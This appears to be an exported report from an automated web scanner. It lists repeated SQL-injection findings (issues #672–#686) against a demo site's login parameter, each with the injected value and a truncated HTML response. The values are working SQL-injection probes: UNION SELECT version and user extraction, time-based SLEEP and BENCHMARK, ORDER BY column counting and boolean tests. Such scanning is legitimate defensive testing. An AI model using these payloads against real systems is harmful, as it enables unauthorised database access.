Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #672Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #673\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io %' AND 8310=8311 AND '%'='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #674\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 12\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #675\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 23--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #676\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #677\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ' AND id IS NULL; --\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #678\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Valuedemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8,9,10#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #679\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 5\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #680\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 13\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #681\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io\" \"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #682\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #683Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io %' AND 8310=8310 AND '%'='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #684\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioSLEEP(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #685\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #686\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AS INJECTX WHERE 1=1 AND 1=1\nResponseContent-type: text/html; charset=UTF-8\n7785 